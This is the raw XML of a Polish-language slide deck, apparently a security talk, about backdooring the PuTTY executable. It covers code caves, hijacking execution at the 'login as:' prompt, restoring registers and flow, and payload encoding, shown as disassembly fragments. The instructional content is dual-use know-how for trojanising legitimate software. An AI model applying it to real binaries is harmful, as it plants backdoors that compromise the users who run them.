                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83100001-237F-DC23-0AFC-EA5857BCFA55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1951437" y="3268684"/>
            <a:ext cx="2407429" cy="692463"/>
            <a:chOff x="1951437" y="3268684"/>
            <a:chExt cx="2407429" cy="692463"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="pole tekstowe 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C737749-F217-35A1-7847-02CF4C2CBB97}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1951437" y="3346052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popfd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i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 err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>popad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26" name="Strzałka: zakrzywiona w prawo 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1A57915-273E-086B-844A-0B14B026DE83}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3810226" y="3268684"/>
              <a:ext cx="548640" cy="692463"/>
            </a:xfrm>
            <a:prstGeom prst="curvedRightArrow">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="ED1B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CBCABACD-3FEC-7DE6-B1B7-C28CF53FFA82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1712323" y="1355277"/>
            <a:ext cx="0" cy="450601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A0A0434-E053-C80F-9830-47D42517EBA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1309082" y="2436805"/>
            <a:ext cx="500009" cy="1984389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adresy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1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3.95833E-6 -0.0942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09421 L -3.95833E-6 -0.19514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0.19514 L -3.95833E-6 -0.1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9421 L -3.95833E-6 -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20" grpId="0" animBg="1"/>
      <p:bldP spid="25" grpId="0" animBg="1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67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PODSTAWOWY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2279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KALKULACJA ESP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253C5218-07DC-7E9D-972E-93903C7E9E01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1121284" y="1555643"/>
            <a:ext cx="635284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0046A419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60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pushad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0046A41A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pushfd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0046A41B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FC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cld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0046A55C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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>53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D1B24"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>push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0046A55D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0000"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0046A55E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90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ED1B24"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="ED1B2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0046A55F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81C4 04020000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add esp,0x204</a:t>
            </a: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0046A565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9D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popfd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0046A566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61            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3CB5EA"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>|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popad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ED1B24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6DB75F5-1207-D82F-9A56-4FD50DED1748}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1007473" y="1581392"/>
            <a:ext cx="0" cy="63203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50A275D-3DE9-9555-19F0-46F16F7D41B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="154511" y="2213428"/>
            <a:ext cx="101612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i="1" dirty="0"/>
              <a:t>breakpoint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91CF2BD-56A5-E94D-CC68-DD0E77ED9C45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7474127" y="1715563"/>
            <a:ext cx="260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ESP1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> 0x0019FF50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7EC013-1761-1111-C978-9AD5BB263BBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7874000" y="3053339"/>
            <a:ext cx="2757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ESP2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> 0x0019FD4C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033A3733-8C3F-7380-0A5A-46737A38F2A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8293518" y="4031054"/>
            <a:ext cx="322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ESP1 – ESP2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>= 0x204 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="37" name="Łącznik: zakrzywiony 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C3793FA-1B6A-7937-8ED7-D41185A336C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6927100" y="3881402"/>
            <a:ext cx="1241540" cy="33431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Łącznik: zakrzywiony 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B88A2312-5C09-FD5F-1FB2-C40CC8F92153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5478237" y="1884840"/>
            <a:ext cx="1995891" cy="482476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Łącznik: zakrzywiony 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A508FF99-B0CD-9ED4-0B5C-B84EA6DE93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2818" y="3222617"/>
            <a:ext cx="2331182" cy="421274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ze strzałką 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C95082D4-01C0-2008-A300-3C9E9F2E5332}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1007472" y="2536637"/>
            <a:ext cx="0" cy="8923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C8DC1C2D-3F6A-E06B-0D41-C821449805B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="154511" y="3429000"/>
            <a:ext cx="1222974" cy="30777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400" i="1" dirty="0"/>
              <a:t>breakpoint</a:t>
            </a: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0F86369B-0309-4919-57B0-7D1052B9B635}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1007472" y="3769538"/>
            <a:ext cx="0" cy="8923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2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567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PODSTAWOWY BACKDOORING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24213890-1826-4C1C-E6A6-785056BD2218}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="439750" y="890358"/>
            <a:ext cx="4232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RESTORING THE EXECUTION FLOW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57616C76-679A-F294-56B1-39066AF3BDA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="439750" y="1462309"/>
            <a:ext cx="56300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004F341A | 90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nop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004F341B | 90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nop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004F341C | 81C4 04020000 | add esp,204  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004F3422 | 9D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popfd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004F3423 | 61            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popad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004F3424 | E8 ADFEFFFF   | call 0x00493D46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004F3429 | E9 C206FAFF   |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jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x00493AF0 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Łącznik: zakrzywiony 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B445C69-5336-556D-A571-07650DA496C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3481143" y="3766173"/>
            <a:ext cx="1856594" cy="1276096"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val 28864"/>
              <a:gd name="adj2" fmla="val 117914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0A719E5-2FE8-4501-51B7-1C673DAAD830}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3771392" y="4890424"/>
            <a:ext cx="5768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00493AEB | E9 E6F70500 |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jmp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0x004F32D6 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US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 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ebp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ebp,esp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  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B8307226-0B32-B8B7-D449-6C8B6210E6D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5956679" y="28288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00493AEB | E8 56020000 | call 0x00493D46</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="18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00493AF0 | E9 7AFEFFFF | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0" err="1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jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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 0x0049396F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00493AF5 | 55          | push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ebp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00493AF6 | 8BEC        | mov </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebp,esp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6D62303-DF80-6931-BC8E-43012BCE3C04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5956679" y="2305615"/>
            <a:ext cx="310437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/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ORIGINAL INSTRUCTIONS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4533713" y="1334407"/>
            <a:ext cx="31245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SUKCES?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0E64C3B-0F83-B41C-6F48-1357407604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38" t="16905"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2526632" y="2558716"/>
            <a:ext cx="7259623" cy="174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95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4168838" y="1121047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NIE DO KOŃCA…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1703FF0-0676-682A-19A8-08CD76A4E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520" y="2001367"/>
            <a:ext cx="8668960" cy="21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174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REDCODE LABS TEAM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Owal 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D243F66F-BF7F-490F-6C7F-02D6666DC9B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="957786" y="1567542"/>
            <a:ext cx="2498271" cy="2498271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E4F32718-CF8C-D77C-7A8C-6B44BD712D49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4846864" y="1567543"/>
            <a:ext cx="2498271" cy="2498271"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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1AE0AF7D-9A42-F519-6A95-8C02280917E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8718957" y="1567541"/>
            <a:ext cx="2498271" cy="2498271"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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B3C4764A-F746-8C8A-0A1D-EF9073351D69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1235684" y="4163785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JAKUB LUTCZYN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7197CE4-EE77-275E-532B-F438D71BDF1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4667626" y="4163785"/>
            <a:ext cx="2954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KONRAD KLAWIKOWSKI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3BF61BB6-B71A-DF45-26E2-550872174010}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8933193" y="4163785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JAKUB WRÓBEL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06D80E63-3C70-3F61-5069-912B54874009}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4846864" y="4483894"/>
            <a:ext cx="2659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lang="pl-PL" sz="11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teamer</a:t>
            </a:r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fanatyk programowania funkcyjnego</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="11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5214783-417F-B763-BB47-0B8FC36AC22F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954626" y="4483893"/>
            <a:ext cx="2659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lang="pl-PL" sz="11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teamer</a:t>
            </a:r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1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pentester</a:t>
            </a:r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 ojciec założyciel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Red Code Labs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="11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E7159213-925C-3C01-FC9B-CBD039B8227A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8718957" y="4483894"/>
            <a:ext cx="26599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Developer i </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1100" b="0" i="1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cybersecowy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1100" b="0" i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entuzjasta</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" i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1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2960366" y="3013501"/>
            <a:ext cx="6271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3078651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0D2423B-1EFE-46B5-BEF8-8BFF1DCAE7AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7005394" y="1903765"/>
            <a:ext cx="2435786" cy="101469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USER INTERACTION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1DEEBF7-C633-F79E-ABFC-74FE9EC1CA6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139741" y="1821958"/>
            <a:ext cx="2138606" cy="322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147AA5-95EA-C289-3B98-EF5ED9FD1332}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3319217" y="145266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normal execution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52D9F5-6FB9-7BCE-6FA2-D809249E0112}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1393602">
            <a:off x="6512059" y="3013946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back to normal execution flow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8DA3E6C4-9F5F-5CC7-E057-DE53AAFF7E43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1482399" y="993287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POINT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B8C700BD-30B8-51B5-E2DD-ACD5EC093D98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5278347" y="961654"/>
            <a:ext cx="1727047" cy="1727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F853C08A-E232-02DB-5391-5663D2A09E18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2551702" y="4204152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REGULAR EXECUTION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01415C8-EB8A-CFB4-0611-E488AE540997}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1341067">
            <a:off x="7134970" y="2061899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execution flow hijacked</a:t>
            </a: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FD7396F8-75C4-239A-373B-6FCB792671E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9264790" y="2580219"/>
            <a:ext cx="1975125" cy="197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CAVE WITH SHELLCODE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6668E4B6-B825-8200-D3BA-881F59BD7578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6752474" y="2435781"/>
            <a:ext cx="2475430" cy="104615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36F36AD0-2730-AF15-AA9A-21324E6CD106}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="12" idx="4"/>
            <a:endCxn id="19" idx="7"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3966332" y="2688701"/>
            <a:ext cx="2175539" cy="17581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21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 animBg="1"/>
      <p:bldP spid="12" grpId="0" animBg="1"/>
      <p:bldP spid="19" grpId="0" animBg="1"/>
      <p:bldP spid="15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3735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USER INTERACTION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5CE862E-C669-F051-3C03-14977F8F3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74" y="1272211"/>
            <a:ext cx="6239997" cy="806977"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Owal 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A4F303F-513F-DA41-2F0A-2281FB17DDF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="555171" y="1347107"/>
            <a:ext cx="1608365" cy="636814"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="ED1B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70D3164A-4B50-0E60-20E1-0727F8D1239A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="715974" y="2365704"/>
            <a:ext cx="8570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0045909B | 68 FC834D00 | push putty.4D83FC | 4D83FC:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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login as: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004590A0 | E8 0B4AFEFF | call putty.43DAB0 </a:t>
            </a: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004590A5 | 83C4 04     | add esp,4 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US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61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3863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USER INTERACTION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60ED0E3-4FBF-3D5F-2C1E-2D958F4EA981}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="610591" y="939371"/>
            <a:ext cx="69332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0045909B | 68 FC834D00 | push putty.4D83FC | 4D83FC:"login as: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="3CB5EA"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p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0045909B | E9 36A20900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0x004F32D6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004590A0 | E8 0B4AFEFF | call 0x0043DAB0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004590A5 | 83C4 04     | add esp,4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8E9C3F3-89EB-B7F2-337A-CC3740D0E86C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5581980" y="1616529"/>
            <a:ext cx="687228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004F32D6 | 60           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pushad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004F32D7 | 9C            | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pushfd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004F32D8 | FC            | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cld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004F341A | 90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nop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004F341B | 90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nop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004F341C | 81C4 04020000 | add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0x204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004F3422 | 9D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popfd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004F3423 | 61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popad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004F3424 | 68 FC834D00   | push 0x004D83FC | 4D83FC:"login as: "</a:t>
            </a:r>
          </a:p>
          <a:p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004F3429 | E9 725CF6FF   | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1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 0x004590A0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13" name="Łącznik: zakrzywiony 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF6131E7-710B-E49E-72C0-12719813540B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4645481" y="1281793"/>
            <a:ext cx="936499" cy="47352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: zakrzywiony 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47045059-C48F-2AB8-F0D4-03EC2D3BA530}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="8" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="610592" y="1416426"/>
            <a:ext cx="4971389" cy="2500255"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 104598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14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4168838" y="1121047"/>
            <a:ext cx="305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JEST LEPIEJ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44C09C2-6315-1BD7-0A43-FB2E05D1B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178" y="2160725"/>
            <a:ext cx="8373644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57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2584269" y="3013501"/>
            <a:ext cx="7023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ENCODING PAYLOADA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7784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0D2423B-1EFE-46B5-BEF8-8BFF1DCAE7AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7005394" y="1903765"/>
            <a:ext cx="2220249" cy="65182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786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0x02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ENCODING PAYLOADA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1DEEBF7-C633-F79E-ABFC-74FE9EC1CA6E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3139741" y="1825177"/>
            <a:ext cx="2138606" cy="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147AA5-95EA-C289-3B98-EF5ED9FD1332}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3319217" y="1452666"/>
            <a:ext cx="1779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normal execution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52D9F5-6FB9-7BCE-6FA2-D809249E0112}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19210997">
            <a:off x="2921961" y="3235020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back to normal execution flow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8DA3E6C4-9F5F-5CC7-E057-DE53AAFF7E43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1482399" y="996506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POINT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B8C700BD-30B8-51B5-E2DD-ACD5EC093D98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5278347" y="961654"/>
            <a:ext cx="1727047" cy="172704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F853C08A-E232-02DB-5391-5663D2A09E18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6373979" y="4372277"/>
            <a:ext cx="1830849" cy="18308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DECODED PAYLOAD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01415C8-EB8A-CFB4-0611-E488AE540997}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="968018">
            <a:off x="7009601" y="1859965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execution flow hijacked</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Owal 15">
            <a:extLst>
